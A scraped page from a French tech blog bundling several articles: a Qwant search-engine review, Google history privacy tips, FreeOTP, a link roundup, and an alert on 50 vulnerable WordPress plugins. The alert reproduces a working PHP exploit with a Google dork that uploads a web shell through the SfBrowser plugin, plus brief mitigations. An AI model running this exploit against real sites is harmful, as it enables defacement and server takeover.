Entrez vos identifiants

x
OU
Vous avez oublié votre mot de passe ?
Utilisateur wiki : vous n'aviez pas d'email ?

Korben - Site d'actualité geek et tech

Go Top
  • Articles populaires

  •  
  • Top 10 Windows

  • Inscrivez-vous à la newsletter

  • DANS TON CHAT (BASHFR)

    <Seb> je déteste danstonchat
    <FFarmor> pk ?
    <Seb> ben je lisais des quotes avec ma copine et on tombe sur celle ou un mec dis "une fille ma envoyé t'es beau mais qu'est ce qu'il y a comme air ds ta tête" ou un truc du genre
    <Seb> et la je lui dis : pour moi aussi tu pourrais la chanter celle la en faisant un peu le fier
    <Seb> et elle me répond
    <Seb> "nan toi ça serait plus le générique de lucky luke...tu tire plus vite que ton ombre"
    <Seb> ben un peu comme l'autre gars, je crois que j'ai pas cherché à comprendre ce qu'elle voulait dire par la.

    -- http://danstonchat.com/2467.html
  • Inscrivez vous aux bon plans

  • RSS Emplois sécurité

  • Site hébergé par
    Agarik Sponsor Korben
  • RSS Offres d’emploi

  • Swiis

  • Articles récents

  • Articles populaires

  • Dernières vidéos

    Snowden – Le film

    Snowden – Le film

    mercredi 1 juillet 20150 1
    Lost Ark trailer first look

    Lost Ark trailer first look

    mardi 30 juin 20150 0
    Self Less

    Self Less

    lundi 29 juin 20150 1
  • Les articles dans "Google"

    Qwant – Mon retour après 1 mois de test

    108

    Qwant – Mon retour après 1 mois de test

    Quand Qwant est arrivé en 2013, j'ai levé un sourcil et je me suis dit : "OK, encore des rigolos qui pensent qu'ils vont réussir à concurrencer Google". En effet, il ne se passe pas un jour sans que je vois émerger des concurrents français de Facebook, Google, Meetic, Twitter et j'en passe.

    Du coup, je suis passé rapidement à autre chose, n'accordant pas plus d'intérêt que ça à ce nouveau moteur français et européen. Puis j'ai eu le plaisir de croiser les équipes de Qwant à plusieurs reprises et de discuter pas mal avec eux, sur leurs envies, leur stratégie et bien sûr sur le moteur en lui-même, ce qui m'a donné envie de m'y intéresser un peu plus.

    L'élément différenciateur et le discours principal de Qwant par rapport à Google, c'est qu'ils ont de véritables engagements vis-à-vis de la vie privée de leurs internautes. Ils ne collectent pas et n'exploitent pas les données de leurs internautes. Le seul truc qui se pose sur votre ordinateur quand vous allez sur Qwant, c'est un simple cookie permettant de conserver votre session active.

    Ils jouent la carte de la transparence absolue et l'indiquent dans leurs CGU. Pas de tracking utilisateur et pas de filtrage des résultats de recherche.

    Niveau financements, Qwant se concentre sur de l'affiliation bête et méchante. Contrairement à Google qui nous profile pour nous fournir des publicités toujours plus ciblées, Qwant se contente d'une commission sur les produits que vous achetez en passant par une recherche. Par exemple, vous cherchez à acheter un nouveau téléphone portable. Vous tapez sa référence dans le moteur de recherche et vous obtenez des résultats de recherche classiques (indexation des sites), des résultats en provenance du web social (Twitter, Facebook...etc.), des résultats d'actualités et des résultats Shopping. Et c'est uniquement si vous passez par un de ses résultats shopping et que vous achetez le produit, que Qwant se rémunèrera.

    shopping

    Pas d'entourloupe donc. Concernant le matos, Qwant repose sur du matos Huawei avec lequel ils ont signé un accord "no backdoor". C'est-à-dire que Huawei s'engage à ce qu'il n'y ait aucune porte dérobée dans leur matériel. Si tel était le cas, le fabricant de serveurs serait alors contraint de dédommager Qwant pour avoir rompu son contrat.

    Côté investisseurs, Qwant est soutenu par le groupe de presse allemand Axel Springer. Ce groupe de presse, c'est celui qui s'est frité avec Google, reprochant au moteur américain son monopole et ses méthodes de ranking qui favorisent les produits et services Google. Plutôt que de pleurer sur leur sort (méthode appliquée en France), Axel Springer a décidé d'agir en soutenant un contrepouvoir à Google.

    En tant qu'éditeur moi-même, je sais que si du jour au lendemain, Google décidait de me faire la peau, je perdrai plus de 50% de mon audience. Sans critiquer Google qui propose des résultats de recherche au poil, le fait qu'une société comme celle-là soit en position de monopole est un véritable danger pour tous les acteurs du net. On l'a vu avec certains sites marchands qui se sont éteints à petit feu, relégué loin derrière les résultats de Google Shopping. Une enquête au niveau européen est d'ailleurs en cours sur ce sujet.

    Avoir du choix, c'est donc mieux pour tout le monde. Et jusqu'à présent, on avait zéro choix. Bing et Yahoo! renvoient des résultats pourris et trackent autant leurs internautes. Il ne nous restait que des services proxy comme Duckduckgo ou Startpage qui utilisent les API de Google pour fournir des résultats de recherches, tout en garantissant l'anonymat des internautes vis-à-vis de Mountain View. Mais ça reste des résultats Made By Google donc dans certains cas, altérés.

    Avant mi-2014, comme beaucoup d'entrevous, j'utilisais Duckduckgo comme moteur par défaut. Souvent déçu des résultats, je repassais quasi systématiquement par Google directement. Puis après je me suis dit que j'allais quand même donner sa chance à Qwant, qui contrairement à ce que disent ses détracteurs, possède son propre index et ne repose sur aucun moteur tiers. J'ai donc configuré Qwant sur tous mes appareils (ordis, smartphones) pour faire un véritable test grandeur nature sur plusieurs mois.

    Et, je ne vous le cache pas. Ce fut une catastrophe. Une ergonomie très discutable et surtout des résultats de recherche ultra-merdiques. Il ne se passait pas une journée sans que je revienne systématiquement vers Google. Lorsque j'ai ensuite rencontré les équipes de Qwant, je leur ai dit en gros qu'ils étaient bien gentils, que j'adhérais totalement à leur vision du monde (vie privée...etc.), mais que ce qu'ils proposaient comme résultats, c'était de la grosse merde en barre.

    Et croyez-le ou non, ils me l'ont confirmé en me disant : "On sait que ce n’est pas top, mais on bosse dur, attend un peu la prochaine version".

    Alors je suis revenu sur Duckduckgo et j'ai attendu... Et c'est lorsque j’étais en vacances mi-avril qu'ils ont mis en prod le "nouveau Qwant". Rebelote, j'ai donc re-configuré Qwant comme moteur par défaut sur tous mes appareils pour refaire un test grandeur nature, sur la durée.

    Et c'est au bout d'un mois d'utilisation full-Qwant, je peux enfin vous livrer mes impressions. Premièrement, niveau transparence et éthique, rien n'a changé pour Qwant. Ils restent dans la droite ligne de ce qu'ils ont toujours annoncé. (Et non, désolé pour les trolls, un cookie de session n'est pas un tracker ;-)).

    Niveau ergonomie, c'est beaucoup plus joli et surtout mieux segmenté.

    qwant

    • 1/ Les images et vidéos OU les produits shopping
    • 2/ Les résultats de recherche
    • 3/ Des infos open graph (En provenance de Wikipedia)
    • 4/ Les actualités
    • 5/ Les résultats du web social
    • 6/ Et our ceux qui n’aimeraient pas se faire polluer les résultats de recherche avec des infos en provenance des réseaux sociaux ou des sites d'actu, sachez qu'il est possible de consulter chaque type de contenu indépendamment.

    Alors niveau images, j'y trouve mon compte, même si ce qui me manque cruellement dans cette section, c'est la possibilité de filtrer les images par taille (petites, moyennes, grandes, très grandes) comme sur...Google. Pas simple par exemple de se trouver un fond d'écran (une grande image quoi) sans y adjoindre le mot wallpaper. J'espère que les équipes de Qwant ajouteront au moins cette possibilité-là.

    Les infos Wikipedia, mon premier avis, c'est que c'était inutile, mais finalement, je vais souvent sur Wikipedia donc ça me fait un accès rapide, c'est pas mal. Les actualités, c'est le même principe que pour Google News... On y retrouve tous les médias et leurs dernières actus qu'il est possible de filtrer par pertinence ou par date.

    Le web social, c'est cool aussi, car ça vient compléter les résultats de recherche avec des infos qui sont parfois plus fraiches que sur le web. On sait à l'instant T ce qui est en train de se dire sur tel ou tel thématique en fonction du mot clé que vous recherchez. Et c'est en temps réel, donc un contenu ultra frais tout le temps.

    Pour ce qui est du shopping, c'est bizarrement ce qui est le moins mis en avant. Les infos de shopping sont appelées uniquement si ce que vous cherchez est un produit que vous voulez acheter. Par exemple, si je cherche le mot "wok", je n'ai pas de proposition immédiate de shopping là dessus :

    wok

    Par contre, si je tape "acheter wok", Qwant saura me proposer des résultats de shopping qui collent avec ma demande (qui est d'acheter).

    wok23

    Alors que sur Google, ce n'est pas le même état d'esprit.

    gg

    Bon, tout ça c'est pour vous montrer que pour le moment en tout cas, ils ne sont pas agressifs du tout, sur cette partie shopping.

    Enfin, et je garde le meilleur pour la fin : Les résultats de recherche.

    Et bien ça n'a plus rien à a voir. C'est le jour et la nuit avec ce qu'ils proposaient avant. Maintenant, je ne vais plus jamais sur Google, mis à part quand j'ai épuisé tous les résultats de recherche de Qwant et que je me dis que sur Google, je trouverai peut être un ou deux trucs en plus. Mais les 3/4 du temps, ce n'est même pas le cas.

    Que ce soit pour des requêtes basiques ou des choses plus techniques ou plus élaborées, Qwant répond maintenant à mes requêtes avec pertinence et rapidité, y compris quand je commence à verser dans les trucs techniques bien tordus, qu'ils soient rédigés en français ou en anglais. On est loin des résultats merdiques d'avant. Maintenant c'est au poil niveau résultats de recherche.

    Petite différence avec les autres moteurs, Qwant ne nous sort pas des palettes entières de résultats paginés, mais se contente de ce message à la fin de ceux-ci :

    Les résultats suivants sont probablement peu pertinents, veuillez reformuler votre requête.

    Ça m'a dérouté au début, étant habitué à l'abondance de résultats, mais finalement, je trouve la plupart du temps ce que je veux directement et si ce n'est pas le cas, je fais ce qu'ils me disent en améliorant ma requête.

    Bref, vous l'aurez compris, je suis conquis par cette nouvelle version du moteur sortie mi-avril et Google n'est plus, pour moi, un passage obligé sur le net. En marge de tout ça, Qwant propose aussi à ceux qui le souhaitent de se créer des carnets, pour agréger du contenu et le rendre public ou le garder privé. Pratique pour tous ceux qui aiment collecter, conserver, et explorer de nouvelles pages découvertes sur le web.

    carnet

    Voilà, je pense que j'ai fait le tour des fonctionnalités. Des moteurs de recherche alternatifs, j'en ai testé des cargaisons entières et c'est la première fois que j'en vois un qui ne se repose pas sur les résultats fournis par les API de Google (ou d'un autre) et qui peut véritablement challenger le moteur américain. Qwant n'est pas meilleur ou moins bien que Google. Il est différent et suffit largement pour 98% des recherches quotidiennes qu'on fait tous sur le web.

    Et si je fais le ratio "respect de ma vie privée" / "qualité des résultats de recherche proposés", Qwant gagne haut la main. En plus, comme ils sont français et très à l'écoute, je ne me prive pas pour leur donner mon avis ou leur demander des fonctionnalités utiles (Genre le filtre par taille pour les images !!). Je pense que vous pouvez faire de même, car ils sont très présents sur les réseaux sociaux et facilement joignables.

    Je vous encourage donc à ne pas partir sur des idées pré-conçues et à tester au moins durant quelques jours, ce nouveau Qwant sorti mi-avril, aussi bien sur vos ordinateurs, que vos tablettes et vos smartphones. Mettez-le par défaut partout et comptez le nombre de fois où vous repassez sur Google par jour. Ensuite, quand vous aurez vraiment testé le bouzin, on pourra tous en discuter sur des bases concrètes et pourquoi pas leur remonter des problèmes pour qu'ils améliorent encore tout ça.

    Pour mettre Qwant par défaut sur vos ordinateurs et smartphones, voici comment faire.

    En ce qui me concerne, ce test qui ne devait durer qu'un petit mois va donc se prolonger pour moi. Je fais maintenant partie des utilisateurs satisfaits de Qwant puisque je n'utilise plus que ça comme moteur.

    Allez, bon après midi à tous !

    Google – Pensez à votre historique

    37

    Google – Pensez à votre historique

    Si vous faites partie des gens qui n'ont rien à cacher, alors cliquez ici, et observez un peu toutes ces merveilleuses recherches que vous avez fait sur Google au cours de ces dernières années.

    Texte, images, applications Android, vidéos YouTube, recherches vocales, adresses (via Google Maps)...etc., tout y est !

    vider

    Bon, quand on le sait, ce n'est pas "gênant" car on peut supprimer des éléments et aller sur Qwant ou DuckDuckGo pour faire des recherches non-historisées.

    export

    Mais quand on ne sait pas, on a l'air d'un couillon le jour où un(e) autre  que vous (votre mec/meuf, votre maman, votre ministre de l'Intérieur...etc.) met les mains sur votre compte Google.

    Google propose une fonctionnalité d'export et vous pouvez choisir aussi de supprimer les éléments un par un ou vider l'historique en fonction d'une durée.

    vider

    Enfin, pour désactiver cet historique permanent, il faut vous rendre dans le menu paramètres (voir première image de cet article), cliquer sur "Afficher plus de paramètres" et décocher toutes les options encore actives.

    log

    Maintenant, vous savez et surtout vous avez le choix.

    Source

    FreeOTP – Une application mobile d’authentification en 2 étapes

    3

    FreeOTP – Une application mobile d’authentification en 2 étapes

    Si vous êtes un fondu d'authentification en 2 étapes, mais que le client Android proposé par Google ne vous convient pas, voici une alternative elle aussi libre, portée par la communauté Fedora.

    Cela s'appelle FreeOTP et ça exploite les standards OTP (One-time Password Protocols) que sont HTOP et TOTP. C'est bien sûr compatible avec tous les services qui font de l'authentification en 2 étapes (Gmail, Dropbox...etc.).

    Les services peuvent être ajoutés simplement en scannant un QR Code ou manuellement.

    freeotpunnamed

    A télécharger ici pour iOS et ici pour Android.

    Bon lundi à tous + 18 liens tout à fait exceptionnels !

    35

    Bon lundi à tous + 18 liens tout à fait exceptionnels !

    Salut les copains,

    bon, c'est lundi et à l'heure où vous lirez cet article, je serai en route pour Londres. Je manquerai donc de temps pour faire quelques articles sympas mais comme je vous aime gros comme ça, j'ai quand même compilé une bonne grosse liste de liens que j'avais prévu de traiter sous la forme d'articles, pour les 3 jours qui viennent !

    Bonne régalade à tous !

    1. Le Top 5 des malwares sur Android.
    2. 10 applets pour Ubuntu à tester
    3. Microsoft envisage de lancer d'ici 2013 des lunettes Kinect pour sa Xbox 720, concurrentes directes des Google Glasses
    4. Une taxe pour les utilisateurs d'Internet Explorer ? Ahahaha, n'importe quoi.
    5. Un script Perl pour scanner votre serveur à la recherche de failles.
    6. Il faut rendre les données maintenant... Va-t-on pouvoir récupérer nos DivX?  Ahahaha.
    7. Un making of du Retour du Jedi tourné en 1982.
    8. Fiddler 2 : Un outil pour Windows qui permet d'analyser les trames d'une application + ses extensions
    9. Songbird 2.0 et sa version pour Android viennent de sortir
    10. L'Europe débloque un budget de 3 millions d'euros pour lutter contre la cyber censure.
    11. Modifier les paramètres cachés de iTunes sous OSX.
    12. Les prédictions de Ray Bradbury qui se sont réalisées.
    13. Combien de temps avant que les VPN ne deviennent illégaux ?
    14. CookieSpy : Pour voir les cookies qui sont enregistrés dans votre système Windows sur tous les navigateurs.
    15. Un lecteur de BD pour Linux
    16. Plus de répertoire Public chez Dropbox.
    17. La carte des réseaux sociaux.
    18. DropSpot : Un outil pour transférer facilement et over the air, des fichiers entre un téléphone Android et votre ordinateur.

    La suite demain...

    Photo

    Alerte – 50 plugins WordPress troués !

    25

    Alerte – 50 plugins WordPress troués !

    Je viens de recevoir par email un adviso de la société Seraum spécialisée en sécurité informatique, qui a mis au jour une faille critique permettant l'upload de fichiers dans plus de 50 plugins WordPress. Du coup, c'est important que vous soyez au courant que si vous utilisez un de ces plugins, vous pouvez vous faire défacer en 2 secondes par un script kiddy qui n'aurait pas école aujourd'hui.

    • Homepage slideshow
    • 3D banner rotator
    • - Nmedia User File Uploader
    • - Front end upload
    • - Poverplay gallery
    • - WordPress Accordion Gallery
    • - Wp superb slideshow
    • - Wp-Property
    • - Video Gallery 1.3
    • - HTML5 Av Manager
    • - Royal Gallery
    • - 3D Flick Slideshow
    • - Image News Slider
    • - RBX Gallery
    • - wp-gpx-map
    • - File groups
    • - User Meta
    • - SfBrowser
    • - WPStoreCart
    • - Hungred Post Thumbnail
    • - MM Forms Community
    • - Tinymce Remind
    • - Gallery
    • - Thinkun Remind
    • - Foxypress
    • - PDW File Browser
    • - VideoWhisper
    • - WordPress Font Uploader
    • - FCChat Widget
    • - Comment Extra Fields
    • - Nmedia WordPress Member Conversation
    • - PictureSurf Gallery
    • - Really simple Gallery (probably vuln)
    • - PICA Photo Gallery
    • - Asset Manager
    • - Vertical slideshow
    • - Carousel slideshow
    • - Front file manager
    • - Omni secure files
    • - Mac photo gallery
    • - Smart slideshow
    • - Bliss Galery
    • - YASS
    • - Catpro Gallery
    • - Matrix Gallery
    • - Gallery Explorer
    • - Dreamwork Gallery
    • - Blaze slideshow
    • - Slideshow pro

    Voici l'exploit en question appliqué à l'un de ces plugins :

    ###########################################################
    #
    # Exploit Title: WordPress SfBrowser Version 1.4.5 Arbitrary File Upload
    # Google Dork: inurl:wp-content/plugins/sfbrowser/connectors/php/
    # Date: 11/06/2012
    # Exploit Author: Adrien Thierry
    # Vendor Homepage: http://www.sjeiti.com/
    # Software Link: http://downloads.wordpress.org/plugin/sfbrowser.zip
    # Version: 1.4.5
    #
    ###########################################################

    Vuln page : http://mysite.com/wp-content/plugins/sfbrowser/connectors/php/sfbrowser.php

    exploit :

    <?php
    $u="C:\Program Files (x86)\EasyPHP-5.3.9\www\shell.ptxt";
    $c = curl_init("http://127.0.0.1/wp/wp-content/plugins/sfbrowser/connectors/php/sfbrowser.php");
    curl_setopt($c, CURLOPT_POST, true);
    curl_setopt($c, CURLOPT_POSTFIELDS,
    array('fileToUpload'=>"@$u",
    'a'=>"upload",
    'file'=>"",
    'deny'=>"lam",
    'allow'=>"ptxt|exe|sh",
    'resize'=>array(0,0)));
    curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
    $e = curl_exec($c);
    curl_close($c);
    echo $e;
    ?>

    shell Access : http://mysite.com/wp-content/plugins/sfbrowser/shell.ptxt

    Pour se protéger, plusieurs possibilités à part virer le plugin vulnérable:

    • Placer un fichier .htaccess dans les dossiers de plugin
    • Placer des index.php vides dans les dossiers qui n'en ont pas
    • Inclure un appel aux variables ABSPATH ou session admin au début de chaque script php

    Quand les dev font de la merde, les admins trinquent ;-)

    Bonne sécurisation à tous !

    Merci à Adrien Thierry, l'auteur de cet exploit de m'avoir informé.

    Il y a aussi ce site, learn to secure your WordPress Installation

    Android Play Store – Télécharger les APK non compatibles avec votre téléphone

    20

    Android Play Store – Télécharger les APK non compatibles avec votre téléphone

    Parfois, il arrive que l'Android Market nous jette parce qu'on n'a pas le téléphone qui va bien pour profiter de telle ou telle application. Il s'agit d'une limitation imposée qui permet d'éviter que des logiciels plantent ou fonctionnent mal sur certains appareils. Mais si vous voulez passer outre et quand même installer l'application interdite sur votre téléphoné supposée non compatible, il existe une solution.

    Ça s'appelle APK downloader, et c'est une extension pour Chrome, qui lorsque vous vous rendez sur le Play Store avec votre ordinateur, téléchargera directement le .apk. Vous pourrez alors ensuite transférer ce .apk sur votre téléphone et l'installer normalement. Attention, il ne s'agit pas ici de pirater le Play Store. Ça ne fonctionne qu'avec des applications déjà accessibles gratuitement.

    Pour en savoir plus, télécharger l'extension Chrome et lire les explications pour l'installer, c'est sur ce site que ça se passe.

    Merci à Koenigbook pour l'info

    En ce moment dans l'univers "Domotique"

    Voir tous les articles »

    En ce moment dans l'univers "Domotique"

    Voir tous les articles »